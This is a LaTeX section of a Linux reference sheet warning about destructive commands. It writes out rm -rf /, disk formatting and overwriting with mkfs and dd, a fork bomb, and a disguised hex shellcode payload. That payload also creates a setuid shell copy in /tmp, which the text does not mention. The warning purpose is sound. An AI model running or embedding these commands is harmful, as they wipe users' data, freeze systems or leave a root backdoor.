\section{Linux deadly commands}
\label{sec:linux_deadly_commands}
\source{https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/}{howtogeek.com}\\\\
\textbf{\textcolor{red}{WARNING}}\\
These commands can and will cause damage to the system you will execute them on. Either avoid them whenever you see any of them, or use them with extreme caution.

%========================================================================================
%========================================================================================

\subsection{Data deletion}
Following command will delete all mounted data storage devices (system files, user data, removable media, etc).
\begin{lstlisting}[style=terminal]
rm -rf /
\end{lstlisting}

This is a example of disguised command. To be exact this is a hex version of command \cmd{rm -rf /}.
\begin{lstlisting}[style=terminal]
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
\end{lstlisting}

Following command formats the \hdd{}.
\begin{lstlisting}[style=terminal]
mkfs.ext4 /dev/sda1
\end{lstlisting}

Following command writes directly to the \hdd{}, which will damage the file-system. \cmd{command} can be any command.
\begin{lstlisting}[style=terminal]
command > /dev/sda
\end{lstlisting}

Following command will fill your \hdd{} with random bits, overwriting your data and damaging the file-system.
\begin{lstlisting}[style=terminal]
dd if=/dev/random of=/dev/sda
\end{lstlisting}

Following will delete your data by moving it into a black hole.
\begin{lstlisting}[style=terminal]
mv ~ /dev/null
\end{lstlisting}

%========================================================================================
%========================================================================================

\subsection{DoS}
Following commands is a fork bomb - it defines a shell function that creates copies of itself and continually replicates (takes up \cpu{} and memory) and will eventually freeze the computer.
\begin{lstlisting}[style=terminal]
:(){ :|: & };:
\end{lstlisting}
